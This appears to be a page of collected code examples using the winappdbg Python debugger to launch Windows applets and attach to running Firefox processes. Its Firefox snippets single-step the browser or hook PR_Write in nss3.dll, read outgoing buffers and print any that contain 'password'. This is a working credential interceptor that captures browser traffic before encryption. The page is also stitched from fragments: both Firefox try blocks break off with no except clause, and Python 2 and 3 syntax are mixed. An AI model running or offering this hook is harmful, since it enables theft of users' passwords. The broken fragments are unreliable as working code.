Beispiel #1
def simple_debugger():
    """Launch three Windows applets under a single debugger session and run its event loop.

    The handler class is wrapped in EventSift rather than instantiated
    directly (presumably so each debuggee gets its own MyEventHandler --
    confirm against the EventSift docs); the commented-out line is the
    direct-instance alternative the author suggests trying.
    """
    handler = EventSift(MyEventHandler)
    # handler = MyEventHandler()  # try uncommenting this line...
    with Debug(handler) as session:
        # Start the debuggees in this exact order, then block in the loop.
        for exe_name in ("calc.exe", "notepad.exe", "charmap.exe"):
            session.execl(exe_name)
        session.loop()
Beispiel #2
    def exit_process(self, event):
        """Handle the debuggee's exit: report it, then relaunch self.name in a new session.

        `event` is accepted for the handler interface but not read; only
        self.name is used. The new session is built exactly like the
        original one (EventSift-wrapped handler, execl, loop).
        """
        print("Detached from %s" % self.name)

        handler = EventSift(MyEventHandler)
        #handler = MyEventHandler()  # try uncommenting this line...
        with Debug(handler) as session:
            session.execl(self.name)
            session.loop()
Beispiel #3
    def single_step(self, event):
        """Single-step handler: copy out the buffer addressed by Rdx/R8 and log pattern hits.

        Rdx is treated as the 2nd call argument (buffer address) and R8 as
        the 3rd (byte count), per the original author's comments; the hook
        set-up that makes this true is not shown here. The range is read
        from the debuggee and logged once for every entry of self.patterns
        that occurs in it, so several matching patterns log the same text
        several times.
        """
        cur_thread = event.get_thread()
        cur_process = event.get_process()
        buf_addr = cur_thread.get_register("Rdx")   # 2nd param: buf
        byte_count = cur_thread.get_register("R8")  # 3rd param: buf amount
        # byte_count comes straight from a debuggee register, so it is not
        # bounded here; a large value means a large read.
        text = str(cur_process.read(buf_addr, byte_count))

        separator = "-" * 50
        for pattern in self.patterns:
            if pattern not in text:
                continue
            mylogger.log_text(separator)
            mylogger.log_text(text)
            mylogger.log_text(separator)


# Module-level logger used by the single_step handler above.
mylogger = winappdbg.Logger()
# Handler class wrapped in EventSift (presumably one handler instance per
# debugged process -- confirm against the EventSift docs).
handler = EventSift(FirefoxHardHookEventHandler)

# bKillOnExit=False: presumably leaves the attached processes running when
# the debugger detaches -- confirm in the Debug API.
with Debug(handler, bKillOnExit=False) as debug:
    found_ff = False
    debug.system.scan()  # refresh the process snapshot before searching it

    # Attach to every running firefox.exe; 'name' from the tuple is unused.
    for (proc, name) in debug.system.find_processes_by_filename("firefox.exe"):
        pid = proc.get_pid()
        debug.attach(pid)
        print "[*] attached debugger to firefox: %d" % pid
        found_ff = True

    # Only enter the event loop when at least one process was attached.
    if found_ff:
        # NOTE(review): this try block is truncated in the listing -- its
        # except/finally clause (presumably KeyboardInterrupt, per the
        # message) is not shown, so the snippet as printed is not valid
        # on its own.
        try:
            print "[*] monitoring CTRL-C to exit"
            debug.loop()
class FirefoxSoftHookEventHandler(EventHandler):
    """Event handler whose apiHooks table hooks PR_Write in nss3.dll.

    apiHooks maps a module name to a list of (function name, argument
    types) entries; winappdbg resolves the matching pre_<name> method on
    this class as the pre-call hook for each entry.
    """

    apiHooks = {
        "nss3.dll": [("PR_Write", (win32.PVOID, win32.PVOID, win32.DWORD32))]
    }

    def pre_PR_Write(self, evt, ra, fd, buf, amount):
        """Pre-call hook for PR_Write(fd, buf, amount).

        `ra` (return address) and `fd` are not used. The `amount` bytes at
        `buf` are copied out of the debuggee and printed only when they
        contain the substring "password"; `amount` is taken as-is from
        the call arguments and is not bounded here.
        """
        payload = evt.get_process().read(buf, amount)
        if "password" not in payload:
            return
        print("[+] %s" % payload)


handler = EventSift(FirefoxSoftHookEventHandler)

with Debug(handler, bKillOnExit=False) as debug:
    found_ff = False
    debug.system.scan()

    for (proc, name) in debug.system.find_processes_by_filename("firefox.exe"):
        pid = proc.get_pid()
        debug.attach(pid)
        print "[*] attached debugger to firefox: %d" % pid
        found_ff = True

    if found_ff:
        try:
            print "[*] monitoring CTRL-C to exit"
            debug.loop()